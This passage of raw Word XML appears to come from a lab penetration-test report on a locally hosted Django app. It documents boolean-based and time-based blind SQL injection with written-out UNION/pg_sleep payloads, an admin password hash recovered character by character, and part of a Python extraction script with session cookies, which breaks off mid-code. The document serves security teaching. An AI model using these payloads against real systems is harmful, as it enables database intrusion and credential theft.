              <w:t>[86/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73E3BCC2" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[87/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CD4A88" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[88/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B0E4C1" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[89/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55446D12" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA"/>
          <w:p w14:paraId="174B4856" w14:textId="3D193BC8" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Recovered hash: pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57545AFF" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33C639" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:t>The hash recovered blindly, one character at a time with no data ever appearing in any response, is byte-for-byte identical to the admin hash extracted directly through the visible UNION injection in Objective 3 (pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH89pQ=). This confirms the blind technique is correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F484D87" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:t>4.5 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2FF32" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:r w:rsidRPr="001221CA">
        <w:t>Objective 4 was achieved. A boolean-based blind SQL injection, using the presence or absence of an injected UNION row as a true/false oracle, was automated with a Python script to recover the administrator's full password hash one character at a time, without the response ever displaying the data directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA10BD2" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:t>Objective 5: Time-Based Blind Extraction (Identical Responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F5F84" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:t>5.1 Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401017D4" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t>Objective 4's oracle relied on a visible difference between responses (an extra row present or absent, changing the match count). For this objective, the response content is made identical on every request, whether the injected condition is true or false: the UNION SELECT always contributes exactly one row with the same value, so the page always renders "1 match." with the same blank field. The only thing that changes is how long the server takes to reply, controlled by wrapping the condition in a CASE expression that calls PostgreSQL's pg_sleep().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB587C" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:lastRenderedPageBreak/>
        <w:t>5.2 Confirming the Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E7AAA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t>I tested a true and a false condition using the same LENGTH(password) test from Objective 4, and compared both the response body and the response time.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00765509" w:rsidRPr="00765509" w14:paraId="2E031F64" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2734C1FF" w14:textId="540EEA3D" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>q=zzzz'</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>UNION</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>NULL,(SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>CASE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>WHEN</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>((SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>LENGTH(password)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>FROM</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>auth_user</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>username='admin')&gt;0)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>THEN</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>pg_sleep(3)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>ELSE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>pg_sleep(0)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>END)::text,NULL,NULL--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48D80B4E" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="00765509">
        <w:t>The condition is true. The response body was 12,109 bytes, identical in structure to every other response from this endpoint, but Burp's timer showed 3,985 milliseconds to complete, consistent with the 3-second sleep plus normal overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23369038" w14:textId="2F5B53E3" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="076CBCBA" wp14:editId="1EC96603">
            <wp:extent cx="6858000" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="199531884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858000" cy="3152775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4788DC" w14:textId="43352DC4" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 5.2a: True condition: identical response body, 3985 ms response time</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00765509" w:rsidRPr="00765509" w14:paraId="0385849E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765A5BED" w14:textId="72AE427D" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>q=zzzz'</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>UNION</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>NULL,(SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>CASE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>WHEN</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>((SELECT</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>LENGTH(password)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>FROM</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>auth_user</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>WHERE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>username='admin')&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>100</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>0)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>THEN</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>pg_sleep(3)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>ELSE</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>pg_sleep(0)</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00765509">
              <w:t>END)::text,NULL,NULL--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="343D5C11" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="00765509">
        <w:t>The condition is false. The response body was 12,115 bytes, effectively identical to the true case above (same structure, same "1 match."), but Burp's timer showed only 384 milliseconds, the pg_sleep(0) branch. The only observable difference between a true and a false answer is this ~3.6-second gap in response time; the page content gives no indication either way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101DAA2" w14:textId="6867DD3D" w:rsidR="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7190EB55" wp14:editId="2F18E076">
            <wp:extent cx="6858000" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101508777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858000" cy="3429000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F27595" w14:textId="0C4514CC" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 5.2b: False condition: identical response body, 384 ms response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ECF770" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00765509">
        <w:t>5.3 Automating the Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD7CFE" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
      <w:r w:rsidRPr="00765509">
        <w:t>I adapted the Objective 4 script (blind_extract_time.py) so the oracle measures wall-clock elapsed time around each request instead of parsing the response text. A response taking longer than a 1-second threshold, well above normal latency and well below the 2-second sleep used, is treated as true; a fast response is treated as false. The same binary-search structure over LENGTH(password) and ascii(substring(...)) from Objective 4 was reused unchanged.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00765509" w:rsidRPr="00765509" w14:paraId="1228A0E3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F85F91" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D76FEA4" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>Objective 5 - Time-based blind SQL injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49139F90" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>Recovers auth_user.password for username='admin' one character at a time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DD23D1" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>Every response has IDENTICAL content ("1 match.", same blank field) regardless</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB3CDDD" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>of the injected condition's truth value. The only signal is response latency:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22ED4EF5" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>a conditional pg_sleep() delays the reply when the condition is true.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04FAE546" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="283A60DC" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A294C3" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1231E990" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FDA024C" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>BASE = "http://127.0.0.1:5001/tickets/search/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0996CDF1" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79675018" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t># Grab a fresh sessionid/csrftoken from Burp (Proxy &gt; HTTP history) before running.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7895BE" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>COOKIES = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C155897" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    "csrftoken": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F46608" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    "sessionid": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFB1E31" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC21D1D" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:lastRenderedPageBreak/>
              <w:t>HEADERS = {"User-Agent": "Mozilla/5.0"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E396CE" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A1D62A8" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>SUBQUERY = "SELECT password FROM auth_user WHERE username='admin'"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="345EB0C2" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t xml:space="preserve">SLEEP_SECONDS = 2     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FAFC145" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t xml:space="preserve">THRESHOLD = 1.0 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04962FCA" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10B402F2" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>def oracle(condition_sql: str) -&gt; bool:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E1B7FB" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    """True if the response took noticeably longer than baseline (condition_sql was true)."""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425C0F9F" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    payload = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D00EC4" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        "zzzz' UNION SELECT NULL,"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28D36466" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        f"(SELECT CASE WHEN ({condition_sql}) THEN pg_sleep({SLEEP_SECONDS}) ELSE pg_sleep(0) END)::text,"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50BF65CF" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>        "NULL,NULL--"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B19E59" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00765509">
              <w:t>    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E14A89B" w14:textId="77777777" w:rsidR="00765509" w:rsidRPr="00765509" w:rsidRDefault="00765509" w:rsidP="00765509">
            <w:pPr>
